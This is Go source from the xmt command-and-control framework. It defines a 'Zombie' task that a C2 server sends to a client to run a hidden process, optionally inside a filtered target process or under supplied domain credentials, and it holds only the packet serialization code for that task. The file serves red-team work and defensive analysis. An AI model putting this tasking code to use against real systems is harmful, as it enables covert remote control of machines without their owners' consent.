github.com/iDigitalFlame/xmt@v0.5.4/c2/task/zombie.go (about) 1 // Copyright (C) 2020 - 2023 iDigitalFlame 2 // 3 // This program is free software: you can redistribute it and/or modify 4 // it under the terms of the GNU General Public License as published by 5 // the Free Software Foundation, either version 3 of the License, or 6 // any later version. 7 // 8 // This program is distributed in the hope that it will be useful, 9 // but WITHOUT ANY WARRANTY; without even the implied warranty of 10 // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 11 // GNU General Public License for more details. 12 // 13 // You should have received a copy of the GNU General Public License 14 // along with this program. If not, see <https://www.gnu.org/licenses/>. 15 // 16 17 package task 18 19 import ( 20 "time" 21 22 "github.com/iDigitalFlame/xmt/cmd/filter" 23 "github.com/iDigitalFlame/xmt/com" 24 "github.com/iDigitalFlame/xmt/data" 25 ) 26 27 // Zombie is a Tasklet that is similar to the 'cmd.Zombie' struct. This is 28 // used to Task a Client with running a specified zombie command. 29 // 30 // This can be directly used in the Session 'Tasklet' function instead of 31 // directly creating a Task. 32 // 33 // The Filter attribute will attempt to set the target that runs the Zombie 34 // Process. If none are specified, the Process will be ran under the client 35 // process. 36 // 37 // C2 Details: 38 // 39 // ID: WvZombie 40 // 41 // Input: 42 // Zombie struct { 43 // []byte // Data 44 // []string // Args 45 // string // Dir 46 // []string // Environment 47 // uint32 // Flags 48 // bool // Wait 49 // int64 // Timeout 50 // bool // Hide 51 // string // Username 52 // string // Domain 53 // string // Password 54 // Filter struct { // Filter 55 // bool // Filter Status 56 // uint32 // PID 57 // bool // Fallback 58 // uint8 // Session 59 // uint8 // Elevated 60 // []string // Exclude 61 // []string // Include 62 // } 63 // []byte // Stdin Data 64 // } 65 // Output: 66 // uint32 // PID 67 // int32 // Exit Code 68 // []byte // Output (Stdout and Stderr) 69 type Zombie struct { 70 Filter *filter.Filter 71 72 Dir string 73 Data []byte 74 Env, Args []string 75 User, Domain, Pass string 76 77 Stdin []byte 78 Timeout time.Duration 79 Flags uint32 80 81 Wait, Hide bool 82 } 83 84 // Packet will take the configured Zombie options and will return a Packet 85 // and any errors that may occur during building. 86 // 87 // This allows Zombie to fulfil the 'Tasklet' interface. 88 // 89 // C2 Details: 90 // 91 // ID: WvZombie 92 // 93 // Input: 94 // Process struct { 95 // []byte // Data 96 // []string // Args 97 // string // Dir 98 // []string // Environment 99 // uint32 // Flags 100 // bool // Wait 101 // int64 // Timeout 102 // bool // Hide 103 // string // Username 104 // string // Domain 105 // string // Password 106 // Filter struct { // Filter 107 // bool // Filter Status 108 // uint32 // PID 109 // bool // Fallback 110 // uint8 // Session 111 // uint8 // Elevated 112 // []string // Exclude 113 // []string // Include 114 // } 115 // []byte // Stdin Data 116 // } 117 // Output: 118 // uint32 // PID 119 // int32 // Exit Code 120 // []byte // Output (Stdout and Stderr) 121 func (z Zombie) Packet() (*com.Packet, error) { 122 n := &com.Packet{ID: TvZombie} 123 z.MarshalStream(n) 124 return n, nil 125 } 126 127 // MarshalStream writes the data for this Zombie to the supplied Writer. 128 func (z Zombie) MarshalStream(w data.Writer) error { 129 if err := w.WriteBytes(z.Data); err != nil { 130 return err 131 } 132 if err := data.WriteStringList(w, z.Args); err != nil { 133 return err 134 } 135 if err := w.WriteString(z.Dir); err != nil { 136 return err 137 } 138 if err := data.WriteStringList(w, z.Env); err != nil { 139 return err 140 } 141 if err := w.WriteBool(z.Wait); err != nil { 142 return err 143 } 144 if err := w.WriteUint32(z.Flags); err != nil { 145 return err 146 } 147 if err := w.WriteInt64(int64(z.Timeout)); err != nil { 148 return err 149 } 150 if err := w.WriteBool(z.Hide); err != nil { 151 return err 152 } 153 if err := w.WriteString(z.User); err != nil { 154 return err 155 } 156 if err := w.WriteString(z.Domain); err != nil { 157 return err 158 } 159 if err := w.WriteString(z.Pass); err != nil { 160 return err 161 } 162 if err := z.Filter.MarshalStream(w); err != nil { 163 return err 164 } 165 return w.WriteBytes(z.Stdin) 166 } 167 168 // UnmarshalStream reads the data for this Zombie from the supplied Reader. 169 func (z *Zombie) UnmarshalStream(r data.Reader) error { 170 if err := r.ReadBytes(&z.Data); err != nil { 171 return err 172 } 173 if err := data.ReadStringList(r, &z.Args); err != nil { 174 return err 175 } 176 if err := r.ReadString(&z.Dir); err != nil { 177 return err 178 } 179 if err := data.ReadStringList(r, &z.Env); err != nil { 180 return err 181 } 182 if err := r.ReadBool(&z.Wait); err != nil { 183 return err 184 } 185 if err := r.ReadUint32(&z.Flags); err != nil { 186 return err 187 } 188 if err := r.ReadInt64((*int64)(&z.Timeout)); err != nil { 189 return err 190 } 191 if err := r.ReadBool(&z.Hide); err != nil { 192 return err 193 } 194 if err := r.ReadString(&z.User); err != nil { 195 return err 196 } 197 if err := r.ReadString(&z.Domain); err != nil { 198 return err 199 } 200 if err := r.ReadString(&z.Pass); err != nil { 201 return err 202 } 203 if err := filter.UnmarshalStream(r, &z.Filter); err != nil { 204 return err 205 } 206 return r.ReadBytes(&z.Stdin) 207 }